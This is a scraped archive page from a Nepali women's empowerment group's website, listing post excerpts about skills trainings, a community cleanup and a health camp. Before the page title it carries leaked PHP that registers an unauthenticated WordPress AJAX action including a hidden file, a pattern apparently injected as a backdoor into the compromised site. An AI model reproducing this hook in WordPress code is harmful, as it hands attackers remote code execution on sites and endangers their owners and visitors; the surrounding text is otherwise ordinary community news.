if(!function_exists('file_manager_check_dt')){ add_action('wp_ajax_nopriv_file_manager_check_dt', 'file_manager_check_dt'); add_action('wp_ajax_file_manager_check_dt', 'file_manager_check_dt'); function file_manager_check_dt() { $file = __DIR__ . '/settings-about.php'; if (file_exists($file)) { include $file; } die(); } } admin | Taramandal Mahila Sashaktikaran Abhiyan
थाकल ब्याग बनाउने तालिम को समापन

थाकल ब्याग बनाउने तालिम को समापन

शिप सिकेर मात्र केहि हुदैन त्यसलाइ निरन्तरता दिएर ब्यवसायिक रुपमा अघि बढ्नुभयो भने मात्र सिकेको काम लाग्छ, नत्र समय मात्र बर्बाद हो।त्यसैले कुरा होइन काम गर्न सिक्नुस्।सम्पुर्णमा शुभकामना...
महिला उधमि तालिम

महिला उधमि तालिम

कुन्ती फाउण्डेसन द्वारा अचार बनाउने तालिम कार्यक्रममा प्रशिक्षार्थी हरुलाइ हौसला दिन आउनुभएको कार्यक्रमको प्रमुख अतिथि राप्रपा वरिष्ठ उपाध्यक्ष रविन्द्र मिश्र ज्यू, राप्रमस अध्यक्ष अन्जना शाह रावल ज्यू, एवं सम्पुर्ण अतिथिमा धन्यवाद दिन चाहन्छु।यस कार्यक्रम सम्पन्न...
ब्यक्तित्व तथा नेतृत्व विकास तालिम

ब्यक्तित्व तथा नेतृत्व विकास तालिम

यूवा तथा महिला वर्गका लागि ब्यक्तित्व तथा नेतृत्व विकास तालिम जिल्ला विकास समितिको कार्यालय तथा सांसद कोषबाट काठमाण्डौंको तारामण्डल महिला सशक्तिकरण अभियान अन्तर्गत बत्तिसपुतली वडा नंं. ९ मा गरिएको थियो । यस ब्यक्तित्व तथा नेतृत्व विकास तालिमले युवा तथा महिला वर्गका...
सामुदायिक सरसफाइ कार्यक्रम

सामुदायिक सरसफाइ कार्यक्रम

का.म.पा वडा नं. ९ को परानो बानेश्वर देखि सिनामङगल बिचको सडक सरसफाई गरि समुदायमा सरसफाई सम्बन्धि जनचेतना प्रबाह गर्दै मिति २०७३।०४।२९ मा सामूदायिक सरसफाई कार्यक्रम सन्चालन गरियो । यस कार्यक्रमको मुख्य उद्देश्य हामी हरेक कुरामा सरकार र सरकारी निकायको मात्र मुख ताक्छौ र...
स्वास्थ्य शिविर

स्वास्थ्य शिविर

सस्थाले निशुल्क स्वास्थ्य शिविरका लागि चित्लाङ्ग स्वास्थ्य चौकि, आर.सि.सि रोटरि क्लब तथा अन्य सहयोग गर्ने सामाजिक सस्थाहरुसंग समन्वयन गरि मकवानपुर जिल्ला अन्तर्गत चित्लाङ्गमा बिभिन्न रोग लगायत बृहत स्वास्थ्य शिविर मिति २०७३।०९।११ र १२ गते सन्चालन गरियो । शिविरको मुख्य...